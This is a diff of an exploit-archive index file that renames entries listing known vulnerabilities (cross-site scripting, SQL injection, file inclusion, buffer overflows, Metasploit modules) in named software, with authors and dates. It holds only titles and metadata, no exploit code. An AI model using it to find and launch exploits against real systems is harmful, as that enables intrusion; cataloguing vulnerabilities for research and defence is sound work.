27676,platforms/php/webapps/27676.txt,"CutePHP CuteNews 1.4.1 Editnews Module Cross-Site Scripting Vulnerability",2006-04-19,LoK-Crew,php,webapps,0 27677,platforms/php/webapps/27677.txt,"Article Publisher 1.0.1 Pro Multiple SQL Injection Vulnerabilities",2006-04-19,r0t,php,webapps,0 @@ -24770,7 +24770,7 @@ id,file,description,date,author,platform,type,port 27711,platforms/php/shellcode/27711.txt,"ThWboard 3.0 Index.PHP Cross-Site Scripting Vulnerability",2006-04-20,"CrAzY CrAcKeR",php,shellcode,0 27712,platforms/cgi/webapps/27712.txt,"Portal Pack 6.0 Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,cgi,webapps,0 27713,platforms/php/webapps/27713.txt,"Manic Web MWGuest 2.1 MWguest.PHP HTML Injection Vulnerability",2006-04-20,"Aliaksandr Hartsuyeu",php,webapps,0 -27714,platforms/osx/dos/27714.txt,"Apple Mac OS X 10.x LZWDecodeVector Crafted TIFF Overflow",2006-04-20,"Tom Ferris",osx,dos,0 +27714,platforms/osx/dos/27714.txt,"Apple Mac OS X 10.x - LZWDecodeVector (.tiff) Overflow",2006-04-20,"Tom Ferris",osx,dos,0 27715,platforms/osx/dos/27715.txt,"Apple Mac OS X 10.x .zip Parsing BOMStackPop() Function Overflow",2006-04-20,"Tom Ferris",osx,dos,0 27716,platforms/multiple/remote/27716.txt,"Asterisk Recording Interface 0.7.15 Audio.PHP Information Disclosure Vulnerability",2006-04-21,"Francois Harvey",multiple,remote,0 27717,platforms/php/webapps/27717.txt,"phpldapadmin 0.9.8 compare_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0 @@ -24855,11 +24855,11 @@ id,file,description,date,author,platform,type,port 27798,platforms/php/webapps/27798.txt,"GeoBlog MOD_1.0 Viewcat.PHP Cross-Site Scripting Vulnerability",2006-05-02,SubjectZero,php,webapps,0 27799,platforms/php/webapps/27799.txt,"Virtual Hosting Control System 2.4.7 .1 Server_day_stats.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,O.U.T.L.A.W,php,webapps,0 27800,platforms/php/webapps/27800.txt,"Pinnacle Cart 3.3 Index.PHP Cross-Site Scripting Vulnerability",2006-05-02,r0t,php,webapps,0 -27801,platforms/linux/remote/27801.txt,"Quagga Routing Software Suite 0.9x RIPd RIPv1 Request Routing Table Disclosure",2006-05-03,"Konstantin V. Gavrilenko",linux,remote,0 -27802,platforms/linux/remote/27802.txt,"Quagga Routing Software Suite 0.9x RIPd RIPv1 RESPONSE Packet Route Injection",2006-05-03,"Konstantin V. Gavrilenko",linux,remote,0 +27801,platforms/linux/remote/27801.txt,"Quagga Routing Software Suite 0.9x - RIPd RIPv1 Request Routing Table Disclosure",2006-05-03,"Konstantin V. Gavrilenko",linux,remote,0 +27802,platforms/linux/remote/27802.txt,"Quagga Routing Software Suite 0.9x - RIPd RIPv1 RESPONSE Packet Route Injection",2006-05-03,"Konstantin V. Gavrilenko",linux,remote,0 27803,platforms/php/webapps/27803.txt,"321soft PhP-Gallery 0.9 index.php path Variable Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0 27804,platforms/php/webapps/27804.txt,"321soft PhP-Gallery 0.9 index.php path Parameter XSS",2006-05-03,d4igoro,php,webapps,0 -27805,platforms/windows/remote/27805.py,"dreamMail e-mail client v4.6.9.2 Stored XSS",2013-08-23,loneferret,windows,remote,0 +27805,platforms/windows/remote/27805.py,"dreamMail e-mail client 4.6.9.2 - Stored XSS",2013-08-23,loneferret,windows,remote,0 27806,platforms/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2 .51817/1.5.2 .50209 Remote Buffer Overflow Vulnerability",2006-05-03,"Gyu Tae",windows,remote,0 27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 Show.PHP Remote File Include Vulnerability",2006-05-03,R@1D3N,php,webapps,0 27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 Index.PHP Multiple SQL Injection Vulnerabilities",2006-05-03,almaster,php,webapps,0 @@ -24980,7 +24980,7 @@ id,file,description,date,author,platform,type,port 27923,platforms/hardware/remote/27923.txt,"D-Link Airspot DSA-3100 Gateway Login_error.SHTML Cross-Site Scripting Vulnerability",2006-05-30,"Jaime Blasco",hardware,remote,0 27924,platforms/php/webapps/27924.txt,"ToendaCMS 0.7 Index.PHP Cross-Site Scripting Vulnerability",2006-05-31,Jokubas,php,webapps,0 27925,platforms/linux/dos/27925.txt,"Linux Kernel 2.6.x Proc dentry_unused Corruption Local Denial of Service Vulnerability",2006-05-31,"Tony Griffiths",linux,dos,0 -27926,platforms/php/webapps/27926.txt,"PHPMyDesktop|arcade 1.0 Index.PHP Local File Include Vulnerability",2006-05-31,darkgod,php,webapps,0 +27926,platforms/php/webapps/27926.txt,"PHPMyDesktop/Arcade 1.0 - Index.PHP Local File Include Vulnerability",2006-05-31,darkgod,php,webapps,0 27927,platforms/php/webapps/27927.txt,"PHP-Nuke 7.x Multiple Remote File Include Vulnerabilities",2005-05-31,ERNE,php,webapps,0 27928,platforms/php/webapps/27928.txt,"OSTicket 1.x Open_form.PHP Remote File Include Vulnerability",2006-05-31,Sweet,php,webapps,0 27929,platforms/php/webapps/27929.txt,"vBulletin 3.0.10 Portal.PHP SQL Injection Vulnerability",2006-05-31,SpC-x,php,webapps,0 @@ -25113,14 +25113,14 @@ id,file,description,date,author,platform,type,port 28065,platforms/multiple/dos/28065.vmx,"VMware Player 1.0.1 Build 19317 Malformed VMX File Denial of Service Vulnerability",2006-06-19,n00b,multiple,dos,0 28066,platforms/php/webapps/28066.txt,"singapore 0.9.x/0.10 Multiple Parameter Traversal Arbitrary File Access",2006-06-19,simo64,php,webapps,0 28067,platforms/php/webapps/28067.txt,"singapore 0.9.x/0.10 index.php template Parameter XSS",2006-06-19,simo64,php,webapps,0 -28068,platforms/php/webapps/28068.txt,"V3 Chat Instant Messenger mail/index.php id Parameter XSS",2006-06-20,Luny,php,webapps,0 -28069,platforms/php/webapps/28069.txt,"V3 Chat Instant Messenger mail/reply.php id Parameter XSS",2006-06-20,Luny,php,webapps,0 -28070,platforms/php/webapps/28070.txt,"V3 Chat Instant Messenger online.php site_id Parameter XSS",2006-06-20,Luny,php,webapps,0 -28071,platforms/php/webapps/28071.txt,"V3 Chat Instant Messenger search.php Multiple Parameter XSS",2006-06-20,Luny,php,webapps,0 -28072,platforms/php/webapps/28072.txt,"V3 Chat Instant Messenger profile.php site_id Parameter XSS",2006-06-20,Luny,php,webapps,0 -28073,platforms/php/webapps/28073.txt,"V3 Chat Instant Messenger profileview.php membername Parameter XSS",2006-06-20,Luny,php,webapps,0 -28074,platforms/php/webapps/28074.txt,"V3 Chat Instant Messenger expire.php cust_name Parameter XSS",2006-06-20,Luny,php,webapps,0 -28075,platforms/php/webapps/28075.txt,"V3 Chat Instant Messenger mycontacts.php membername Arbitrary User Buddy List Manipulation",2006-06-20,Luny,php,webapps,0 +28068,platforms/php/webapps/28068.txt,"V3 Chat Instant Messenger - mail/index.php id Parameter XSS",2006-06-20,Luny,php,webapps,0 +28069,platforms/php/webapps/28069.txt,"V3 Chat Instant Messenger - mail/reply.php id Parameter XSS",2006-06-20,Luny,php,webapps,0 +28070,platforms/php/webapps/28070.txt,"V3 Chat Instant Messenger - online.php site_id Parameter XSS",2006-06-20,Luny,php,webapps,0 +28071,platforms/php/webapps/28071.txt,"V3 Chat Instant Messenger - search.php Multiple Parameter XSS",2006-06-20,Luny,php,webapps,0 +28072,platforms/php/webapps/28072.txt,"V3 Chat Instant Messenger - profile.php site_id Parameter XSS",2006-06-20,Luny,php,webapps,0 +28073,platforms/php/webapps/28073.txt,"V3 Chat Instant Messenger - profileview.php membername Parameter XSS",2006-06-20,Luny,php,webapps,0 +28074,platforms/php/webapps/28074.txt,"V3 Chat Instant Messenger - expire.php cust_name Parameter XSS",2006-06-20,Luny,php,webapps,0 +28075,platforms/php/webapps/28075.txt,"V3 Chat Instant Messenger - mycontacts.php membername Arbitrary User Buddy List Manipulation",2006-06-20,Luny,php,webapps,0 28076,platforms/php/webapps/28076.txt,"Vbulletin 3.0.9/3.5.x Member.PHP Cross-Site Scripting Vulnerability",2006-06-20,CrAzY.CrAcKeR,php,webapps,0 28077,platforms/linux/dos/28077.txt,"GnuPG 1.4.3/1.9.x Parse_User_ID Remote Buffer Overflow Vulnerability",2006-06-20,"Evgeny Legerov",linux,dos,0 28078,platforms/php/webapps/28078.txt,"e107 0.7.5 Subject field HTML injection Vulnerability",2006-06-21,"EllipSiS Security",php,webapps,0 @@ -25180,7 +25180,7 @@ id,file,description,date,author,platform,type,port 28133,platforms/php/webapps/28133.txt,"newsPHP 2006 PRO index.php Multiple Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0 28134,platforms/php/webapps/28134.txt,"newsPHP 2006 PRO inc/rss_feed.php category Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0 28135,platforms/osx/dos/28135.pl,"Apple Mac OS X 10.4.x OpenLDAP Denial Of Service Vulnerability",2006-06-27,"Mu Security research",osx,dos,0 -28136,platforms/php/webapps/28136.pl,"Vincent-Leclercq News 5.2 Diver.PHP SQL Injection Vulnerability",2006-06-23,DarkFig,php,webapps,0 +28136,platforms/php/webapps/28136.pl,"Vincent-Leclercq News 5.2 - Diver.PHP SQL Injection Vulnerability",2006-06-23,DarkFig,php,webapps,0 28137,platforms/php/webapps/28137.txt,"SoftBiz Banner Exchange Script 1.0 insertmember.php city Parameter XSS",2006-06-29,securityconnection,php,webapps,0 28138,platforms/php/webapps/28138.txt,"SoftBiz Banner Exchange Script 1.0 lostpassword.php PHPSESSID Parameter XSS",2006-06-29,securityconnection,php,webapps,0 28139,platforms/php/webapps/28139.txt,"SoftBiz Banner Exchange Script 1.0 gen_confirm_mem.php PHPSESSID Parameter XSS",2006-06-29,securityconnection,php,webapps,0 @@ -25204,7 +25204,7 @@ id,file,description,date,author,platform,type,port 28157,platforms/php/webapps/28157.txt,"VirtuaStore 2.0 Password Parameter SQL Injection Vulnerability",2006-07-03,supermalhacao,php,webapps,0 28158,platforms/php/webapps/28158.txt,"QTO File Manager 1.0 Multiple Cross-Site Scripting Vulnerabilities",2006-07-03,"EllipSiS Security",php,webapps,0 28159,platforms/php/webapps/28159.txt,"Glossaire 1.7 Remote File Include Vulnerability",2006-07-03,"CrAzY CrAcKeR",php,webapps,0 -28160,platforms/linux/dos/28160.txt,"Gentoo-Specific MPG123 Malicious URI Remote Buffer Overflow Vulnerability",2006-07-03,"Horst Schirmeier",linux,dos,0 +28160,platforms/linux/dos/28160.txt,"Gentoo-Specific MPG123 - URI Remote Buffer Overflow Vulnerability",2006-07-03,"Horst Schirmeier",linux,dos,0 28161,platforms/php/webapps/28161.txt,"PHPWebGallery 1.x Comments.PHP Cross-site Scripting Vulnerability",2006-07-04,iss4m,php,webapps,0 28162,platforms/php/webapps/28162.txt,"Randshop 0.9.3/1.2 Index.PHP Remote File Include Vulnerability",2006-07-04,black-code,php,webapps,0 28163,platforms/php/webapps/28163.txt,"PostNuke 0.6x/0.7x Multiple Cross-Site Scripting Vulnerabilities",2006-07-04,rgod,php,webapps,0 @@ -25225,7 +25225,7 @@ id,file,description,date,author,platform,type,port 28180,platforms/php/webapps/28180.txt,"ATutor 1.5.x admin/fix_content.php submit Parameter XSS",2006-07-06,"Security News",php,webapps,0 28181,platforms/linux/remote/28181.c,"AdPlug 2.0 Multiple Remote File Buffer Overflow Vulnerabilities",2006-07-06,"Luigi Auriemma",linux,remote,0 28182,platforms/multiple/dos/28182.java,"MICO Object Key 2.3.12 Remote Denial of Service Vulnerability",2006-07-06,tuergeist,multiple,dos,0 -28183,platforms/windows/remote/28183.py,"eM Client e-mail client v5.0.18025.0 Stored XSS vulnerability",2013-09-10,loneferret,windows,remote,0 +28183,platforms/windows/remote/28183.py,"eM Client e-mail client 5.0.18025.0 - Stored XSS vulnerability",2013-09-10,loneferret,windows,remote,0 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0 28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 (search.php, cat_id param) - SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 28186,platforms/windows/remote/28186.c,"Kaillera 0.86 Message Buffer Overflow Vulnerability",2006-07-06,"Luigi Auriemma",windows,remote,0 @@ -25322,7 +25322,7 @@ id,file,description,date,author,platform,type,port 28280,platforms/php/webapps/28280.txt,"wwwThreads Calendar.PHP Cross-Site Scripting Vulnerability",2006-07-26,l2odon,php,webapps,0 28281,platforms/php/webapps/28281.txt,"phpbb-auction 1.x auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 28282,platforms/php/webapps/28282.txt,"phpbb-auction 1.x auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 -28283,platforms/hardware/webapps/28283.txt,"Zyxel Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,hardware,webapps,0 +28283,platforms/hardware/webapps/28283.txt,"Zyxel Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,hardware,webapps,0 28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 ActiveX Control (IcoLaunch) File Execution",2013-09-15,Blake,windows,remote,0 28285,platforms/php/webapps/28285.txt,"Zyxel Prestige 660H-61 ADSL Router RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,php,webapps,0 28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 NDFXArtEffects Stack Overflow Vulnerability",2006-07-27,hdm,windows,dos,0 @@ -25348,7 +25348,7 @@ id,file,description,date,author,platform,type,port 28306,platforms/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 signup.php site_name Parameter SQL Injection",2006-07-31,SirDarckCat,php,webapps,0 28307,platforms/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 admin.php Multiple Parameter SQL Injection",2006-07-31,SirDarckCat,php,webapps,0 28308,platforms/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 members.php cfg_root Parameter Remote File Inclusion",2006-07-31,SirDarckCat,php,webapps,0 -28309,platforms/php/webapps/28309.txt,"Seir Anphin V666 Community Management System Multiple SQL Injection Vulnerabilities",2006-07-31,CR,php,webapps,0 +28309,platforms/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injection Vulnerabilities",2006-07-31,CR,php,webapps,0 28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component Admin.Moskool.PHP Remote File Include Vulnerability",2006-07-31,saudi.unix,php,webapps,0 28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 Myevent.PHP Remote File Include Vulnerability",2006-07-31,CeNGiZ-HaN,php,webapps,0 28312,platforms/multiple/remote/28312.txt,"VMware ESX 2.x Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",multiple,remote,0 @@ -25709,7 +25709,7 @@ id,file,description,date,author,platform,type,port 28683,platforms/linux/dos/28683.txt,"HylaFAX+ 5.2.4 - 5.5.3 - Buffer Overflow",2013-10-02,"Dennis Jenkins",linux,dos,0 28684,platforms/php/webapps/28684.txt,"Gnew 2013.1 - Multiple Vulnerabilities",2013-10-02,"High-Tech Bridge SA",php,webapps,80 28685,platforms/php/webapps/28685.txt,"GLPI 0.84.1 - Multiple Vulnerabilities",2013-10-02,"High-Tech Bridge SA",php,webapps,0 -28686,platforms/php/webapps/28686.txt,"My-BIC 0.6.5 Mybic_Server.PHP Remote File Include Vulnerability",2006-09-25,Root3r_H3ll,php,webapps,0 +28686,platforms/php/webapps/28686.txt,"My-BIC 0.6.5 - Mybic_Server.PHP Remote File Include Vulnerability",2006-09-25,Root3r_H3ll,php,webapps,0 28687,platforms/php/webapps/28687.txt,"php_news 2.0 user_user.php language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28688,platforms/php/webapps/28688.txt,"php_news 2.0 admin/news.php language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28689,platforms/php/webapps/28689.txt,"php_news 2.0 admin/catagory.php language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 @@ -25744,7 +25744,7 @@ id,file,description,date,author,platform,type,port 28723,platforms/php/webapps/28723.txt,"Aanval 7.1 build 70151 - Multiple Vulnerabilities",2013-10-04,xistence,php,webapps,80 28724,platforms/windows/remote/28724.rb,"SIEMENS Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution",2013-10-04,metasploit,windows,remote,0 28725,platforms/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 Cross-Site Scripting Vulnerability",2006-09-28,"ILION Research",multiple,remote,0 -28726,platforms/multiple/dos/28726.pl,"OpenSSL SSLv2 Null Pointer Dereference Client Denial of Service Vulnerability",2006-09-28,"Noam Rathaus",multiple,dos,0 +28726,platforms/multiple/dos/28726.pl,"OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service Vulnerability",2006-09-28,"Noam Rathaus",multiple,dos,0 28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 Multiple Remote File Include Vulnerabilities",2006-09-28,D_7J,php,webapps,0 28728,platforms/php/webapps/28728.txt,"Geotarget Script.PHP Remote File Include Vulnerability",2006-09-29,"RaVeR shi mozi",php,webapps,0 28729,platforms/php/webapps/28729.txt,"PhpBB XS 0.58 Multiple Remote File Include Vulnerabilities",2006-09-30,xoron,php,webapps,0 @@ -25990,11 +25990,11 @@ id,file,description,date,author,platform,type,port 28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 SQL Injection and Remote Code Execution",2013-10-15,"Jason Kratzer",unix,webapps,0 28973,platforms/windows/remote/28973.rb,"HP Data Protector Cell Request Service Buffer Overflow",2013-10-15,metasploit,windows,remote,0 28974,platforms/windows/remote/28974.rb,"MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free",2013-10-15,metasploit,windows,remote,0 -28975,platforms/hardware/webapps/28975.txt,"My File Explorer v1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,hardware,webapps,0 +28975,platforms/hardware/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,hardware,webapps,0 28976,platforms/hardware/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - File Include Vulnerability",2013-10-15,Vulnerability-Lab,hardware,webapps,0 -28977,platforms/hardware/webapps/28977.txt,"UbiDisk File Manager v2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,hardware,webapps,0 +28977,platforms/hardware/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,hardware,webapps,0 28978,platforms/hardware/webapps/28978.txt,"Apple iOS 7.0.2 - Sim Lock Screen Display Bypass Vulnerability",2013-10-15,Vulnerability-Lab,hardware,webapps,0 -28979,platforms/linux/webapps/28979.txt,"DornCMS Application v1.4 - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,linux,webapps,0 +28979,platforms/linux/webapps/28979.txt,"DornCMS Application 1.4 - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,linux,webapps,0 28980,platforms/php/webapps/28980.txt,"WordPress 2.0.5 Functions.PHP Remote File Include Vulnerability",2006-11-11,_ANtrAX_,php,webapps,0 28981,platforms/multiple/remote/28981.txt,"IBM WebSphere 6.0 Faultactor Cross-Site Scripting Vulnerability",2006-11-13,"Nuri Fattah",multiple,remote,0 28982,platforms/php/webapps/28982.txt,"cPanel 10 seldir.html dir Parameter XSS",2006-11-13,"Aria-Security Team",php,webapps,0 @@ -26167,10 +26167,10 @@ id,file,description,date,author,platform,type,port 29160,platforms/linux/remote/29160.c,"GNU Tar 1.1x GNUTYPE_NAMES Remote Directory Traversal Vulnerability",2006-11-21,"Teemu Salmela",linux,remote,0 29161,platforms/osx/dos/29161.txt,"Apple Mac OS X 10.4.8 UDTO Disk Image Remote Denial of Service Vulnerability",2006-11-21,LMH,osx,dos,0 29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 0 Weblog.php Cross-Site Scripting Vulnerability",2006-11-21,the_Edit0r,php,webapps,0 -29164,platforms/windows/dos/29164.cpp,"FortKnox Personal Firewall 9.0.305.0 & 10.0.305.0 - Kernel Driver (fortknoxfw.sys) Memory Corruption Vulnerability",2013-10-24,"Arash Allebrahim",windows,dos,0 +29164,platforms/windows/dos/29164.cpp,"FortKnox Personal Firewall 9.0.305.0 & 10.0.305.0 - Kernel Driver (fortknoxfw.sys) Memory Corruption Vulnerability",2013-10-24,"Arash Allebrahim",windows,dos,0 29165,platforms/php/webapps/29165.txt,"PMOS Help Desk 2.3 ticketview.php Multiple Parameter XSS",2006-11-22,SwEET-DeViL,php,webapps,0 29166,platforms/php/webapps/29166.txt,"PMOS Help Desk 2.3 ticket.php email Parameter XSS",2006-11-22,SwEET-DeViL,php,webapps,0 -29167,platforms/windows/remote/29167.rb,"NetGear WG311v1 Wireless Driver 2.3.1 10 SSID Heap Buffer Overflow Vulnerability",2006-11-22,"Laurent Butti",windows,remote,0 +29167,platforms/windows/remote/29167.rb,"NetGear WG311v1 Wireless Driver 2.3.1 - 10 SSID Heap Buffer Overflow Vulnerability",2006-11-22,"Laurent Butti",windows,remote,0 29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 Keystone.EXE Local Denial of Service Vulnerability",2006-11-23,Hessam-x,windows,dos,0 29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional File Handling Buffer Overflow Vulnerability",2006-11-23,LSsec.com,windows,remote,0 29172,platforms/windows/dos/29172.txt,"Microsoft Office 97 HTMLMARQ.OCX Library Denial of Service Vulnerability",2006-11-22,"Michal Bucko",windows,dos,0 @@ -26304,7 +26304,7 @@ id,file,description,date,author,platform,type,port 29312,platforms/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)",2013-10-30,absane,hardware,webapps,0 29313,platforms/php/webapps/29313.txt,"Xt-News 0.1 show_news.php id_news Parameter XSS",2006-12-22,Mr_KaLiMaN,php,webapps,0 29314,platforms/php/webapps/29314.txt,"Xt-News 0.1 show_news.php id_news Parameter SQL Injection",2006-12-22,Mr_KaLiMaN,php,webapps,0 -29316,platforms/php/remote/29316.py,"Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner v2)",2013-10-31,noptrix,php,remote,0 +29316,platforms/php/remote/29316.py,"Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)",2013-10-31,noptrix,php,remote,0 29318,platforms/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple XSS/SQLi Vulnerabilities",2013-10-31,LiquidWorm,php,webapps,0 29319,platforms/php/remote/29319.rb,"vTigerCRM 5.3.0 5.4.0 - Authenticated Remote Code Execution",2013-10-31,metasploit,php,remote,80 29320,platforms/php/remote/29320.rb,"NAS4Free - Arbitrary Remote Code Execution",2013-10-31,metasploit,php,remote,80 @@ -26315,9 +26315,9 @@ id,file,description,date,author,platform,type,port 29325,platforms/php/remote/29325.rb,"ProcessMaker Open Source Authenticated PHP Code Execution",2013-10-31,metasploit,php,remote,80 29326,platforms/php/webapps/29326.txt,"Opsview pre 4.4.1 - Blind SQL Injection",2013-10-31,"J. Oquendo",php,webapps,80 29327,platforms/windows/local/29327.py,"Watermark Master 2.2.23 - Buffer Overflow (SEH)",2013-11-01,metacom,windows,local,0 -29328,platforms/php/webapps/29328.txt,"ImpressPages CMS v3.6 Remote Arbitrary File Deletion Vulnerability",2013-11-01,LiquidWorm,php,webapps,0 +29328,platforms/php/webapps/29328.txt,"ImpressPages CMS 3.6 - Remote Arbitrary File Deletion Vulnerability",2013-11-01,LiquidWorm,php,webapps,0 29330,platforms/php/webapps/29330.txt,"WordPress Switchblade Themes Arbitrary File Upload Vulnerability",2013-11-01,"Byakuya Kouta",php,webapps,0 -29331,platforms/php/webapps/29331.txt,"ImpressPages CMS v3.6 manage() Function Remote Code Execution Exploit",2013-11-01,LiquidWorm,php,webapps,0 +29331,platforms/php/webapps/29331.txt,"ImpressPages CMS 3.6 - manage() Function Remote Code Execution Exploit",2013-11-01,LiquidWorm,php,webapps,0 29332,platforms/php/webapps/29332.txt,"WordPress Think Responsive Themes Arbitrary File Upload Vulnerability",2013-11-01,"Byakuya Kouta",php,webapps,0 29333,platforms/asp/webapps/29333.txt,"Efkan Forum 1.0 Grup Variable SQL Injection Vulnerability",2006-12-22,ShaFuq31,asp,webapps,0 29334,platforms/cfm/webapps/29334.txt,"Future Internet index.cfm Multiple Parameter SQL Injection",2006-12-23,Linux_Drox,cfm,webapps,0 @@ -26432,7 +26432,7 @@ id,file,description,date,author,platform,type,port 29447,platforms/windows/dos/29447.txt,"WinZip 9.0 Command Line Remote Buffer Overflow Vulnerability",2007-01-12,"Umesh Wanve",windows,dos,0 29448,platforms/osx/remote/29448.txt,"Apple Mac OS X 10.4.8 - DMG UFS Byte_Swap_Sbin() Integer Overflow Vulnerability",2007-01-12,LMH,osx,remote,0 29449,platforms/multiple/remote/29449.html,"Oracle ORADC ActiveX Control Remote Code Execution Vulnerability",2007-01-12,"Umesh Wanve",multiple,remote,0 -29450,platforms/php/webapps/29450.txt,"Ezboxx 0.7.6 Beta Multiple Input Validation Vulnerabilities",2007-01-12,"Doron P",php,webapps,0 +29450,platforms/php/webapps/29450.txt,"Ezboxx 0.7.6 Beta Multiple Input Validation Vulnerabilities",2007-01-12,"Doron P",php,webapps,0 29451,platforms/php/webapps/29451.txt,"All In One Control Panel 1.3.x cp_downloads.php did Parameter SQL Injection",2007-01-12,Coloss,php,webapps,0 29452,platforms/osx/dos/29452.txt,"Apple Mac OS X 10.4.8 - DMG UFS UFS_LookUp Denial Of Service Vulnerability",2007-01-13,LMH,osx,dos,0 29453,platforms/php/webapps/29453.php,"PHP-Nuke 7.x Block-Old_Articles.PHP SQL Injection Vulnerability",2007-01-13,Paisterist,php,webapps,0 @@ -26485,7 +26485,7 @@ id,file,description,date,author,platform,type,port 29506,platforms/php/webapps/29506.txt,"Bitweaver 1.3.1 Articles and Blogs Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,CorryL,php,webapps,0 29507,platforms/php/webapps/29507.txt,"212Cafe Guestbook 4.00 Show.PHP Cross-Site Scripting Vulnerability",2007-01-22,Linux_Drox,php,webapps,0 29508,platforms/php/webapps/29508.sh,"Vote! Pro 4.0 Multiple PHP Code Execution Vulnerabilities",2007-01-23,r0ut3r,php,webapps,0 -29509,platforms/osx/dos/29509.txt,"Apple Mac OS X 10.4.8 - QuickDraw GetSrcBits32ARGB Remote Memory Corruption Vulnerability",2007-01-23,LMH,osx,dos,0 +29509,platforms/osx/dos/29509.txt,"Apple Mac OS X 10.4.8 - QuickDraw GetSrcBits32ARGB Remote Memory Corruption Vulnerability",2007-01-23,LMH,osx,dos,0 29512,platforms/php/webapps/29512.txt,"Vanilla Forums 2.0 - 2.0.18.5 (class.utilitycontroller.php) - PHP Object Injection Vulnerability",2013-11-08,EgiX,php,webapps,80 29513,platforms/linux/remote/29513.rb,"VICIdial Manager Send OS Command Injection",2013-11-08,metasploit,linux,remote,80 29514,platforms/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection Vulnerability",2013-11-08,"High-Tech Bridge SA",php,webapps,80 @@ -26563,7 +26563,7 @@ id,file,description,date,author,platform,type,port 29591,platforms/php/webapps/29591.txt,"Tagit! Tagit2b 2.1.B Build 2 tagmin/updateconf.php admin Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 29592,platforms/php/webapps/29592.txt,"Tagit! Tagit2b 2.1.B Build 2 tagmin/updatefilter.php admin Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 29593,platforms/php/webapps/29593.txt,"Tagit! Tagit2b 2.1.B Build 2 tagmin/wordfilter.php admin Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29594,platforms/windows/local/29594.txt,"Watermark Master v2.2.23 .wstyle - Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0 +29594,platforms/windows/local/29594.txt,"Watermark Master 2.2.23 .wstyle - Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0 29595,platforms/linux/remote/29595.txt,"PHP RRD Browser 0.2 P Parameter Directory Traversal Vulnerability",2007-02-12,"Sebastian Wolfgarten",linux,remote,0 29596,platforms/asp/webapps/29596.txt,"EWay 4 Default.APSX Cross-Site Scripting Vulnerability",2007-02-12,"BLacK ZeRo",asp,webapps,0 29597,platforms/asp/webapps/29597.txt,"Community Server SearchResults.ASPX Cross-Site Scripting Vulnerability",2007-02-12,BL4CK,asp,webapps,0 @@ -26582,7 +26582,7 @@ id,file,description,date,author,platform,type,port 29610,platforms/php/webapps/29610.txt,"Ezboo Webstats 3.03 Administrative Authentication Bypass Vulnerability",2007-02-16,sn0oPy,php,webapps,0 29611,platforms/asp/webapps/29611.txt,"Turuncu Portal 1.0 H_Goster.ASP SQL Injection Vulnerability",2007-02-16,chernobiLe,asp,webapps,0 29612,platforms/hardware/webapps/29612.txt,"WBR-3406 Wireless Broadband NAT Router Web-Console - Password Change Bypass & CSRF Vulnerability",2013-11-15,"Yakir Wizman",hardware,webapps,0 -29613,platforms/windows/dos/29613.txt,"CoolPlayer+ Portable v2.19.4 - Local Buffer Overflow",2013-11-15,"Mike Czumak",windows,dos,0 